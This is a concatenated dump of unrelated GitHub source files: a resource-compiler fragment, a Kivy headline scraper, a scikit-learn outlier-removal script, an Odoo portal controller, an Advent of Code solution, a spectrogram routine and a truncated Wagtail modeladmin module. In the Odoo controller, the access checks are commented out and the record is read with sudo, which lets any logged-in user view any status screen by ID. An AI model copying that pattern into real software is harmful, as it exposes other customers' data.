o.write(u''' std::make_pair(1,\"generated by LithTech Resource compiler\\\\n\\\\n\" \\\\\n \"2018 (c) Rene 'Katana Steel' Kjellerup, distributed under the terms\" \\\\\n \" of\\\\nthe GNU General Public Licenses version 3 or later for details\" \\\\\n \" see:\\\\nhttp://www.gnu.org/licenses/gpl.html\\\\n\")\n};\n\nextern \"C\" {\n const char* LoadString(uint32_t id)\n {\n auto res = std::find_if(str_tab.begin(),\n str_tab.end(),\n [id](std::pair<uint32_t, const char*> x){\n return (x.first == id);\n });\n if(res != str_tab.end())\n return res->second;\n else\n return nullptr;\n }\n}\n\nvoid setup_cursors() { }\n\nvoid setup_string_tables() {\n bool c = false;\n for(auto&& p : str_tab)\n c = (LoadString(p.first) == p.second);\n}\n''')\n","repo_name":"leoschur/lithtech","sub_path":"libs/DynRes/rc.parser.py","file_name":"rc.parser.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"38434620277","text":"from kivymd.app import MDApp\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom kivymd.uix.list import OneLineListItem\r\nfrom kivymd.uix.toolbar import MDToolbar\r\nfrom kivymd.uix.dialog import MDDialog\r\nclass MainApp(MDApp):\r\n\tdef build(self):\r\n\t\tself.theme_cls.primary_palette = \"Blue\"\r\n\r\n\tdef on_start(self):\r\n\t\turl = \"http://www.times.co.sz\"\r\n\t\tresponse = requests.get(url)\r\n\r\n\t\tsoup = BeautifulSoup(response.content, 'html5lib')\r\n\t\theadlines = []\r\n\r\n\t\ttable = soup.find('div', attrs = {'id':'more_news_index'})\r\n\t\tfor row in table.findAll('h2'):\r\n\t\t\ttemp = row.text\r\n\t\t\theadlines.append(temp)\r\n\t\t\r\n\t\tfor headline in headlines:\r\n\t\t\tself.root.ids.container.add_widget(\r\n\t\t\t\tOneLineListItem(text=headline,))\r\n\r\n\t\r\n\t\t\t\t\r\nMainApp().run()","repo_name":"Lazarus78534396/ekuseni","sub_path":"HeadlinesApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14383653151","text":"from sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import RobustScaler\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\nimport os\r\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, f1_score, confusion_matrix, \\\r\n matthews_corrcoef, accuracy_score, roc_curve, auc, roc_auc_score\r\nfrom sklearn.model_selection import train_test_split, KFold, train_test_split, train_test_split\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import AdaBoostClassifier, BaggingClassifier, GradientBoostingClassifier, \\\r\n GradientBoostingClassifier, VotingClassifier, RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport random\r\nimport glob\r\n\r\nclass MisClassify():\r\n def __init__(self):\r\n self.evaluationName = ['Precision', 'F1Score', 'Accuracy', 'Recall', 'Matt', 'Auc']\r\n self.run_times = 100\r\n self.threshould = 90\r\n\r\n def multiclass_roc_auc_score(self, y_test, y_pred, average=\"macro\"):\r\n lb = LabelBinarizer()\r\n lb.fit(y_test)\r\n y_test = lb.transform(y_test)\r\n y_pred = lb.transform(y_pred)\r\n return roc_auc_score(y_test, y_pred, average=average)\r\n\r\n def misClassifyFrequency(self, ytest, ypred, idx):\r\n mis = []\r\n for i in range(len(ytest)):\r\n if (ytest[i] != ypred[i]):\r\n mis.append(idx[i])\r\n return mis\r\n\r\n def doClassify(self, X, y, classifier, nfold=10):\r\n Data = X\r\n misclassify = np.zeros(len(y))\r\n evlP = np.zeros((10,6))\r\n k = 0\r\n kf = KFold(n_splits=nfold, shuffle=True, random_state=random.randint(1, 100))\r\n for train_index, test_index in kf.split(Data):\r\n classifier.fit(Data[train_index], y[train_index])\r\n y_pred = classifier.predict(Data[test_index])\r\n y_test = y[test_index]\r\n\r\n evlP[k][0] = (precision_score(y_test, y_pred, average='micro'))\r\n evlP[k][1] = (f1_score(y_test, y_pred, average='macro'))\r\n evlP[k][2] = (accuracy_score(y_test, y_pred))\r\n evlP[k][3] = (recall_score(y_test, y_pred, average=\"weighted\"))\r\n evlP[k][4] = (matthews_corrcoef(y_test, y_pred))\r\n evlP[k][5] = self.multiclass_roc_auc_score(y_test, y_pred)\r\n # evlP[k][5]= 0\r\n\r\n # cm = confusion_matrix(y_test, y_pred)\r\n k += 1\r\n mis = self.misClassifyFrequency(y_test, y_pred, test_index)\r\n for item in mis:\r\n misclassify[item] += 1\r\n\r\n average = evlP.mean(axis=0)\r\n average = np.squeeze(np.asarray(average))\r\n modelparams = pd.DataFrame({'Evaluating Function': self.evaluationName, 'Values': average})\r\n return modelparams, misclassify\r\n\r\n def applyModel(self, X, y, model):\r\n misclassify = []\r\n for i in range(len(y)):\r\n misclassify.append(0)\r\n\r\n for i in range(self.run_times):\r\n params, mis = self.doClassify(X, y, model)\r\n for i, item in enumerate(mis):\r\n if (item >= 1):\r\n misclassify[i] += 1\r\n\r\n return misclassify\r\n\r\n def RemoveMisAndRunClassify(self, dataframe, model, miss ):\r\n ncol = dataframe.values.shape[1]\r\n rawdata = np.array(dataframe.to_numpy())\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n selIndex = []\r\n for i, item in enumerate(miss):\r\n if (item < self.threshould):\r\n selIndex.append(i)\r\n X = rawdata[selIndex, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[selIndex, ncol - 1]\r\n y = y.astype(np.float)\r\n X = StandardScaler().fit_transform(X)\r\n evalP = np.zeros((100,6))\r\n\r\n for i in range(100):\r\n r0 ,mismis = obj.doClassify(X, y, model)\r\n evalP[i,:] = r0.to_numpy()[:, 1]\r\n\r\n evalP = evalP.mean(axis=0)\r\n\r\n return evalP\r\n\r\n def RemoveCorrelated(self, dataframe):\r\n corr_matrix = dataframe.corr().abs()\r\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\r\n to_drop = {}\r\n for i in range(upper.values.shape[0]):\r\n for j in range(i + 1, upper.values.shape[0]):\r\n if upper.values[i, j] >= 0.50:\r\n to_drop[upper.columns[j]] = 1\r\n\r\n uncorrelated_data = dataframe.drop(to_drop.keys(), axis=1)\r\n return uncorrelated_data\r\n\r\n def FindIndex(self, missing, thresuld):\r\n indexes = []\r\n for i, item in enumerate(missing):\r\n if (item > thresuld):\r\n indexes.append(i)\r\n return indexes\r\n def MakeModel(self):\r\n ada = AdaBoostClassifier(n_estimators=100, base_estimator=None, learning_rate=1, random_state=1)\r\n knn = KNeighborsClassifier(n_neighbors=5, metric='euclidean')\r\n nivebase = GaussianNB()\r\n dt = DecisionTreeClassifier(criterion=\"gini\", random_state=100, max_depth=3, min_samples_leaf=5)\r\n lg = LogisticRegression(random_state=0)\r\n svclassifier = SVC(kernel='rbf')\r\n randomforest = RandomForestClassifier(n_estimators=10) # Train the model on training data\r\n mlp = MLPClassifier(hidden_layer_sizes=(20, 3), max_iter=150, alpha=1e-4, solver='sgd', verbose=10, tol=1e-4,\r\n random_state=1, learning_rate_init=.1)\r\n return ada,knn,nivebase,dt,lg,svclassifier,randomforest,mlp;\r\n def ReadExcelFile(self, filename, sheetname):\r\n dataframe = pd.read_excel(io=filename, sheet_name=sheetname)\r\n uncorrelated = self.RemoveCorrelated(dataframe)\r\n # nrow = uncorrelated.values.shape[0]\r\n # colheader = list(uncorrelated.columns.values)\r\n # PID = rawdata[:, 0]\r\n\r\n ncol = uncorrelated.values.shape[1]\r\n rawdata = np.array(uncorrelated.to_numpy())\r\n X = rawdata[:, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n X = RobustScaler().fit_transform(X)\r\n return X, y\r\n def ApplyAllMissing(self, path):\r\n onlyfiles = glob.glob(path)\r\n totalAUC = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalACC = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalRecall = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalPrecision = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalf1 = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalmatt = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n for i, item in enumerate(onlyfiles):\r\n sheetname = os.path.basename(item).split('.')[0]\r\n print('processing {}'.format(sheetname))\r\n dataframe = pd.read_excel(io=item, sheet_name=\"Sheet1\")\r\n uncorrelated = self.RemoveCorrelated(dataframe)\r\n nrow = uncorrelated.values.shape[0]\r\n ncol = uncorrelated.values.shape[1]\r\n colheader = list(uncorrelated.columns.values)\r\n rawdata = np.array(uncorrelated.to_numpy())\r\n PID = rawdata[:, 0]\r\n X = rawdata[:, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n X = StandardScaler().fit_transform(X)\r\n\r\n try:\r\n ada, knn, nivebase, dt, lg, svclassifier, randomforest, mlp = self.MakeModel()\r\n\r\n misada = obj.applyModel(X, y, ada)\r\n misknn = obj.applyModel(X, y, knn)\r\n misnb = obj.applyModel(X, y, nivebase)\r\n misdt = obj.applyModel(X, y, dt)\r\n mislg = obj.applyModel(X, y, lg)\r\n missvm = obj.applyModel(X, y, svclassifier)\r\n misrf = obj.applyModel(X, y, randomforest)\r\n mismlp = obj.applyModel(X, y, mlp)\r\n\r\n\r\n #r0 = obj.RemoveMisAndRunClassify(uncorrelated, ada, misada)\r\n r1 = obj.RemoveMisAndRunClassify(uncorrelated, knn, misknn)\r\n r2 = obj.RemoveMisAndRunClassify(uncorrelated, nivebase, misnb)\r\n r3 = obj.RemoveMisAndRunClassify(uncorrelated, dt, misdt)\r\n r4 = obj.RemoveMisAndRunClassify(uncorrelated, lg, mislg)\r\n r5 = obj.RemoveMisAndRunClassify(uncorrelated, svclassifier, missvm)\r\n r6 = obj.RemoveMisAndRunClassify(uncorrelated, randomforest, misrf)\r\n #r7 = obj.RemoveMisAndRunClassify(uncorrelated, mlp, mismlp)\r\n\r\n result = pd.DataFrame({'Evaluating Function': self.evaluationName,\r\n 'Ada': r1,\r\n 'KNN': r1,\r\n 'NB': r2,\r\n 'DT': r3,\r\n 'LR': r4,\r\n 'SVM': r5,\r\n 'RF': r6,\r\n 'MLP': r1})\r\n self.evaluationName = ['Precision', 'F1Score', 'Accuracy', 'Recall', 'Matt', 'Auc']\r\n\r\n totalPrecision.loc[i] = [sheetname] + list(result.values[0, 1:])\r\n totalf1.loc[i] = [sheetname] + list(result.values[1, 1:])\r\n totalACC.loc[i] = [sheetname] + list(result.values[2, 1:])\r\n totalRecall.loc[i] = [sheetname] + list(result.values[3, 1:])\r\n totalmatt.loc[i] = [sheetname] + list(result.values[4, 1:])\r\n totalAUC.loc[i] = [sheetname] + list(result.values[5, 1:])\r\n except:\r\n import sys\r\n print(sys.exc_info()[0])\r\n pass\r\n totalPrecision.to_csv(\"Result/totalPrecision.csv\")\r\n totalf1.to_csv(\"Result/totalF1.csv\")\r\n totalACC.to_csv(\"Result/totalACC.csv\")\r\n totalRecall.to_csv(\"Result/totalRecall.csv\")\r\n totalmatt.to_csv(\"Result/totalMatt.csv\")\r\n totalAUC.to_csv(\"Result/totalAUC.csv\")\r\n\r\ncops_proteins = \"TestData/*.xlsx\"\r\nobj = MisClassify()\r\nobj.ApplyAllMissing(cops_proteins)\r\n\r\n\r\n","repo_name":"karimrahimian/moonlight_proteins","sub_path":"RemoveOutliers.py","file_name":"RemoveOutliers.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19586427937","text":"from odoo import http, _\nfrom odoo.exceptions import AccessError\nfrom odoo.http import request\n\nfrom odoo.addons.website_portal.controllers.main import website_account\n\n\nclass website_account(website_account):\n\n @http.route()\n def account(self, **kw):\n \"\"\" Add sales documents to main account page \"\"\"\n response = super(website_account, self).account(**kw)\n partner = request.env.user.partner_id\n\n StatusScreen = request.env['stewart.status.screen']\n status_screen_count = StatusScreen.search_count([\n ('partner_id', 'in', [partner.commercial_partner_id.id])\n ])\n\n response.qcontext.update({\n 'status_screen_count': status_screen_count,\n })\n return response\n \n @http.route(['/my/screen/<int:screen>'], type='http', auth=\"user\", website=True)\n def status_screen_followup(self, screen, **kw):\n screen = request.env['stewart.status.screen'].browse([screen])\n# try:\n# screen.check_access_rights('read')\n# screen.check_access_rule('read')\n# except AccessError:\n# return request.render(\"website.403\")\n\n screen_sudo = screen.sudo()\n screen_lines = {il.name.id: il.id for il in screen_sudo.mapped('list_of_materials')}\n\n return request.render(\"alex_stewart.status_screen_followup\", {\n 'screen': screen_sudo,\n 'screen_lines': screen_lines,\n })\n \n @http.route(['/my/status_screens', '/my/status_screens/page/<int:page>'], type='http', auth=\"user\", website=True)\n def portal_my_status(self, page=1, date_begin=None, date_end=None, **kw):\n values = self._prepare_portal_layout_values()\n partner = request.env.user.partner_id\n StatusScreen = request.env['stewart.status.screen']\n\n domain = [\n ('partner_id', 'in', [partner.commercial_partner_id.id])\n ]\n archive_groups = self._get_archive_groups('stewart.status.screen', domain)\n if date_begin and date_end:\n domain += [('create_date', '>', date_begin), ('create_date', '<=', date_end)]\n\n # count for pager\n status_count = StatusScreen.search_count(domain)\n # pager\n pager = request.website.pager(\n url=\"/my/status_screens\",\n url_args={'date_begin': date_begin, 'date_end': date_end},\n total=status_count,\n page=page,\n step=self._items_per_page\n )\n # content according to pager and archive selected\n statuses = StatusScreen.search(domain, limit=self._items_per_page, offset=pager['offset'])\n\n values.update({\n 'date': date_begin,\n 'statuses': statuses,\n 'page_name': 'Screen',\n 'pager': pager,\n 'archive_groups': archive_groups,\n 'default_url': '/my/status_screens',\n })\n return request.render(\"alex_stewart.portal_my_status_screens\", values)\n\n# \n ","repo_name":"stepanetssergey/alex_stewart","sub_path":"controller/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11746589580","text":"import fileinput\n\ninput_lines = list(fileinput.input())\n\npath = [x.strip() for x in input_lines[0].split(\",\")]\n\nposition = [0, 0]\ndirection = 0\nvisited_positions = [position[:]]\n\nfor step in path:\n turn = step[0]\n length = int(step[1:])\n direction = (direction + (1 if turn == \"R\" else -1)) % 4\n for unit_step in range(length):\n position[direction % 2] += 1 - (direction // 2) * 2\n if position in visited_positions:\n print(sum(abs(i) for i in position))\n exit()\n else:\n visited_positions.append(position[:])\n","repo_name":"gergely-elias/advent_of_code","sub_path":"2016/d01p2.py","file_name":"d01p2.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"69954675513","text":"import numpy as np\nimport scipy.signal\nfrom .utils import check_episode\n\n__all__ = ['spectrogram']\n\n\n# for reference only\ndef _spectrogram_scipy(snd, window=('tukey', 0.25), nperseg=256, noverlap=None,\n nfft=None, detrend='constant', return_onesided=True,\n scaling='density'):# , mode='psd'): # for new scipy\n f, t, Sxx = scipy.signal.spectrogram(x=snd.read_frames(), fs=snd.fs,\n window=window,\n nperseg=nperseg,\n noverlap=noverlap,\n nfft=nfft,\n detrend=detrend,\n return_onesided=return_onesided,\n scaling=scaling, axis=0)# ,\n # mode=mode)\n return f, t, Sxx\n\n\ndef spectrogram(snd, nt=1000, nperseg=512, nfft=None, scaling='density',\n window='hann', startframe=None, endframe=None,\n starttime=None, endtime=None, dtype=np.float64):\n startframe, endframe = check_episode(startframe=startframe,\n endframe=endframe,\n starttime=starttime,\n endtime=endtime,\n fs=snd.fs,\n nframes=snd.nframes)\n nperseg = int(nperseg)\n if nperseg < 1:\n raise ValueError('nperseg must be a positive integer')\n if nfft is None:\n nfft = nperseg\n elif nfft < nperseg:\n raise ValueError('nfft must be greater than or equal to nperseg.')\n else:\n nfft = int(nfft)\n nt = int(nt)\n if nt < 1:\n raise ValueError('nt must be larger than zero.')\n window = scipy.signal.windows.get_window(window, nperseg)\n f = np.fft.rfftfreq(n=nfft, d=1 / float(snd.fs))\n if scaling == 'density':\n scale = 1.0 / (snd.fs * (window * window).sum())\n elif scaling == 'spectrum':\n scale = 1.0 / window.sum() ** 2\n else:\n raise ValueError('Unknown scaling: %r' % scaling)\n input = np.zeros((nfft, nt, snd.nchannels), dtype=dtype)\n starts = np.linspace(startframe, endframe - nperseg, nt, dtype='int64')\n t = (starts.astype('float64') + nperseg / 2.0) / float(snd.fs)\n with snd.open():\n for i, start in enumerate(starts):\n input[:nperseg,i] = snd.read_frames(startframe=start,\n endframe=start + nperseg).astype(dtype)\n input[:nperseg] *= window[:,np.newaxis, np.newaxis]\n v = np.fft.rfft(input, axis=0)\n sg = np.abs(v * v.conjugate()) * scale\n if nfft % 2:\n sg[1:] *= 2\n else:\n # Last point is unpaired Nyquist freq point, don't double\n sg[1:-1] *= 2\n return f, t, sg\n\n","repo_name":"gbeckers/soundlab","sub_path":"soundlab/spectrotemporal.py","file_name":"spectrotemporal.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26374102241","text":"import warnings\nfrom collections import OrderedDict\n\nfrom django import VERSION as DJANGO_VERSION\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.admin import FieldListFilter\nfrom django.contrib.admin.options import IncorrectLookupParameters\nfrom django.contrib.admin.utils import (\n get_fields_from_path,\n label_for_field,\n lookup_field,\n prepare_lookup_value,\n quote,\n unquote,\n)\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import (\n FieldDoesNotExist,\n ImproperlyConfigured,\n ObjectDoesNotExist,\n PermissionDenied,\n SuspiciousOperation,\n)\nfrom django.core.paginator import InvalidPage, Paginator\nfrom django.db import models, transaction\nfrom django.db.models.fields.related import ManyToManyField, OneToOneRel\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.decorators import method_decorator\nfrom django.utils.encoding import force_str\nfrom django.utils.functional import cached_property\nfrom django.utils.html import format_html\nfrom django.utils.http import urlencode\nfrom django.utils.text import capfirst\nfrom django.utils.translation import gettext as _\nfrom django.utils.translation import gettext_lazy\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import FormView\nfrom django.views.generic.list import MultipleObjectMixin\n\nfrom wagtail.admin import messages\nfrom wagtail.admin.ui.tables import Column, DateColumn, Table, UserColumn\nfrom wagtail.admin.views.generic.base import WagtailAdminTemplateMixin\nfrom wagtail.admin.views.mixins import SpreadsheetExportMixin\nfrom wagtail.log_actions import log\nfrom wagtail.log_actions import registry as log_registry\nfrom wagtail.models import Locale, RevisionMixin, TranslatableMixin\n\nfrom .forms import ParentChooserForm\n\ntry:\n from django.contrib.admin.utils import lookup_spawns_duplicates\nexcept ImportError:\n # fallback for Django <4.0\n from django.contrib.admin.utils import (\n lookup_needs_distinct as lookup_spawns_duplicates,\n )\n\n\nQUERY_TERMS = {\n \"contains\",\n \"day\",\n \"endswith\",\n \"exact\",\n \"gt\",\n \"gte\",\n \"hour\",\n \"icontains\",\n \"iendswith\",\n \"iexact\",\n \"in\",\n \"iregex\",\n \"isnull\",\n \"istartswith\",\n \"lt\",\n \"lte\",\n \"minute\",\n \"month\",\n \"range\",\n \"regex\",\n \"search\",\n \"second\",\n \"startswith\",\n \"week_day\",\n \"year\",\n}\n\n\nclass WMABaseView(TemplateView):\n \"\"\"\n Groups together common functionality for all app views.\n \"\"\"\n\n model_admin = None\n meta_title = \"\"\n page_title = \"\"\n page_subtitle = \"\"\n\n def __init__(self, model_admin):\n self.model_admin = model_admin\n self.model = model_admin.model\n self.opts = self.model._meta\n self.app_label = force_str(self.opts.app_label)\n self.model_name = force_str(self.opts.model_name)\n self.verbose_name = force_str(self.opts.verbose_name)\n self.verbose_name_plural = force_str(self.opts.verbose_name_plural)\n self.pk_attname = self.opts.pk.attname\n self.is_pagemodel = model_admin.is_pagemodel\n self.permission_helper = model_admin.permission_helper\n self.url_helper = model_admin.url_helper\n\n def check_action_permitted(self, user):\n return True\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n if not self.check_action_permitted(request.user):\n raise PermissionDenied\n button_helper_class = self.model_admin.get_button_helper_class()\n self.button_helper = button_helper_class(self, request)\n return super().dispatch(request, *args, **kwargs)\n\n @cached_property\n def menu_icon(self):\n return self.model_admin.get_menu_icon()\n\n @cached_property\n def header_icon(self):\n return self.menu_icon\n\n def get_page_title(self):\n return self.page_title or capfirst(self.opts.verbose_name_plural)\n\n def get_meta_title(self):\n return self.meta_title or self.get_page_title()\n\n @cached_property\n def index_url(self):\n return self.url_helper.index_url\n\n @cached_property\n def create_url(self):\n return self.url_helper.create_url\n\n def get_base_queryset(self, request=None):\n return self.model_admin.get_queryset(request or self.request)\n\n def get_context_data(self, **kwargs):\n context = {\n \"view\": self,\n \"model_admin\": self.model_admin,\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n\nclass ModelFormView(WMABaseView, FormView):\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.edit_handler = self.get_edit_handler()\n\n def get_form(self):\n form = super().get_form()\n return form\n\n def get_edit_handler(self):\n edit_handler = self.model_admin.get_edit_handler()\n return edit_handler.bind_to_model(self.model_admin.model)\n\n def get_form_class(self):\n return self.edit_handler.get_form_class()\n\n def get_success_url(self):\n return self.index_url\n\n def get_instance(self):\n return getattr(self, \"instance\", None) or self.model()\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update({\"instance\": self.get_instance(), \"for_user\": self.request.user})\n return kwargs\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_form_view_extra_css()},\n js=self.model_admin.get_form_view_extra_js(),\n )\n\n def get_context_data(self, form=None, **kwargs):\n if form is None:\n form = self.get_form()\n\n bound_panel = self.edit_handler.get_bound_panel(\n form=form, instance=form.instance, request=self.request\n )\n\n prepopulated_fields = self.get_prepopulated_fields(form)\n context = {\n \"is_multipart\": form.is_multipart(),\n \"edit_handler\": bound_panel,\n \"form\": form,\n \"prepopulated_fields\": prepopulated_fields,\n \"media\": self.media + bound_panel.media + form.media,\n }\n context.update(kwargs)\n return super().get_context_data(**context)\n\n def get_prepopulated_fields(self, form):\n fields = []\n for field_name, dependencies in self.model_admin.get_prepopulated_fields(\n self.request\n ).items():\n missing_dependencies = [\n f\"'{f}'\" for f in dependencies if f not in form.fields\n ]\n if len(missing_dependencies) != 0:\n missing_deps_string = \", \".join(missing_dependencies)\n dependency_string = (\n \"dependencies\" if len(missing_dependencies) > 1 else \"dependency\"\n )\n warnings.warn(\n f\"Missing {dependency_string} {missing_deps_string} for prepopulated_field '{field_name}''.\",\n category=RuntimeWarning,\n )\n elif field_name in form.fields:\n fields.append(\n {\n \"field\": form[field_name],\n \"dependencies\": [form[f] for f in dependencies],\n }\n )\n return fields\n\n def get_success_message(self, instance):\n return _(\"%(model_name)s '%(object)s' created.\") % {\n \"model_name\": capfirst(self.opts.verbose_name),\n \"object\": instance,\n }\n\n def get_success_message_buttons(self, instance):\n button_url = self.url_helper.get_action_url(\"edit\", quote(instance.pk))\n return [messages.button(button_url, _(\"Edit\"))]\n\n def get_error_message(self):\n model_name = self.verbose_name\n return _(\"The %(object)s could not be created due to errors.\") % {\n \"object\": model_name\n }\n\n def form_valid(self, form):\n self.instance = form.save()\n messages.success(\n self.request,\n self.get_success_message(self.instance),\n buttons=self.get_success_message_buttons(self.instance),\n )\n return redirect(self.get_success_url())\n\n def form_invalid(self, form):\n messages.validation_error(self.request, self.get_error_message(), form)\n return self.render_to_response(self.get_context_data(form=form))\n\n\nclass InstanceSpecificView(WMABaseView):\n\n instance_pk = None\n pk_quoted = None\n instance = None\n locale = None\n\n def __init__(self, model_admin, instance_pk):\n super().__init__(model_admin)\n self.instance_pk = unquote(instance_pk)\n self.pk_quoted = quote(self.instance_pk)\n filter_kwargs = {self.pk_attname: self.instance_pk}\n object_qs = model_admin.model._default_manager.get_queryset().filter(\n **filter_kwargs\n )\n self.instance = get_object_or_404(object_qs)\n\n if getattr(settings, \"WAGTAIL_I18N_ENABLED\", False) and issubclass(\n model_admin.model, TranslatableMixin\n ):\n self.locale = self.instance.locale\n\n def get_page_subtitle(self):\n return self.instance\n\n @cached_property\n def edit_url(self):\n return self.url_helper.get_action_url(\"edit\", self.pk_quoted)\n\n @cached_property\n def delete_url(self):\n return self.url_helper.get_action_url(\"delete\", self.pk_quoted)\n\n def get_context_data(self, **kwargs):\n context = {\"instance\": self.instance}\n context.update(kwargs)\n return super().get_context_data(**context)\n\n\nclass IndexView(SpreadsheetExportMixin, WMABaseView):\n\n ORDER_VAR = \"o\"\n ORDER_TYPE_VAR = \"ot\"\n PAGE_VAR = \"p\"\n SEARCH_VAR = \"q\"\n ERROR_FLAG = \"e\"\n EXPORT_VAR = \"export\"\n IGNORED_PARAMS = (ORDER_VAR, ORDER_TYPE_VAR, SEARCH_VAR, EXPORT_VAR)\n\n # sortable_by is required by the django.contrib.admin.templatetags.admin_list.result_headers\n # template tag - see https://docs.djangoproject.com/en/stable/ref/contrib/admin/#django.contrib.admin.ModelAdmin.sortable_by\n sortable_by = None\n\n # add_facets is required by the django.contrib.admin.filters.ListFilter.choices method\n # as of Django 5.0 - see https://github.com/django/django/pull/16495\n add_facets = False\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n # Only continue if logged in user has list permission\n if not self.permission_helper.user_can_list(request.user):\n raise PermissionDenied\n\n self.list_export = self.model_admin.get_list_export(request)\n self.list_display = self.model_admin.get_list_display(request)\n self.list_filter = self.model_admin.get_list_filter(request)\n self.search_fields = self.model_admin.get_search_fields(request)\n self.items_per_page = self.model_admin.list_per_page\n self.select_related = self.model_admin.list_select_related\n self.search_handler = self.model_admin.get_search_handler(\n request, self.search_fields\n )\n self.export = request.GET.get(self.EXPORT_VAR)\n\n # Get search parameters from the query string.\n try:\n self.page_num = int(request.GET.get(self.PAGE_VAR, 0))\n except ValueError:\n self.page_num = 0\n\n if DJANGO_VERSION >= (5, 0):\n self.params = request.GET.copy()\n else:\n self.params = request.GET.dict()\n\n if self.PAGE_VAR in self.params:\n del self.params[self.PAGE_VAR]\n if self.ERROR_FLAG in self.params:\n del self.params[self.ERROR_FLAG]\n if self.EXPORT_VAR in self.params:\n del self.params[self.EXPORT_VAR]\n\n self.query = request.GET.get(self.SEARCH_VAR, \"\")\n\n self.queryset = self.get_queryset(request)\n\n if self.export in self.FORMATS:\n return self.as_spreadsheet(self.queryset, self.export)\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_filename(self):\n \"\"\"Get filename for exported spreadsheet, without extension\"\"\"\n return getattr(self.model_admin, \"export_filename\", super().get_filename())\n\n def get_heading(self, queryset, field):\n \"\"\"Get headings for exported spreadsheet column for the relevant field\"\"\"\n heading_override = self.export_headings.get(field)\n if heading_override:\n return force_str(heading_override)\n return force_str(\n label_for_field(\n field, model=self.model, model_admin=self.model_admin\n ).title()\n )\n\n def to_row_dict(self, item):\n \"\"\"Returns an OrderedDict (in the order given by list_export) of the exportable information for a model instance\"\"\"\n row_dict = OrderedDict()\n for field in self.list_export:\n f, attr, value = lookup_field(field, item, self.model_admin)\n if not value:\n value = getattr(\n attr,\n \"empty_value_display\",\n self.model_admin.get_empty_value_display(field),\n )\n row_dict[field] = value\n\n return row_dict\n\n @property\n def media(self):\n return forms.Media(\n css={\"all\": self.model_admin.get_index_view_extra_css()},\n js=self.model_admin.get_index_view_extra_js(),\n )\n\n def get_buttons_for_obj(self, obj):\n return self.button_helper.get_buttons_for_obj(\n obj, classnames_add=[\"button-small\"]\n )\n\n def get_search_results(self, request, queryset, search_term):\n kwargs = self.model_admin.get_extra_search_kwargs(request, search_term)\n kwargs[\"preserve_order\"] = self.ORDER_VAR in request.GET\n return self.search_handler.search_queryset(queryset, search_term, **kwargs)\n\n def get_filters_params(self, params=None):\n \"\"\"\n Returns all params except IGNORED_PARAMS\n \"\"\"\n if not params:\n params = self.params\n lookup_params = params.copy() # a dictionary of the query string\n # Remove all the parameters that are globally and systematically\n # ignored.\n for ignored in self.IGNORED_PARAMS:\n if ignored in lookup_params:\n del lookup_params[ignored]\n return lookup_params\n\n def get_filters(self, request):\n lookup_params = self.get_filters_params()\n use_distinct = False\n\n 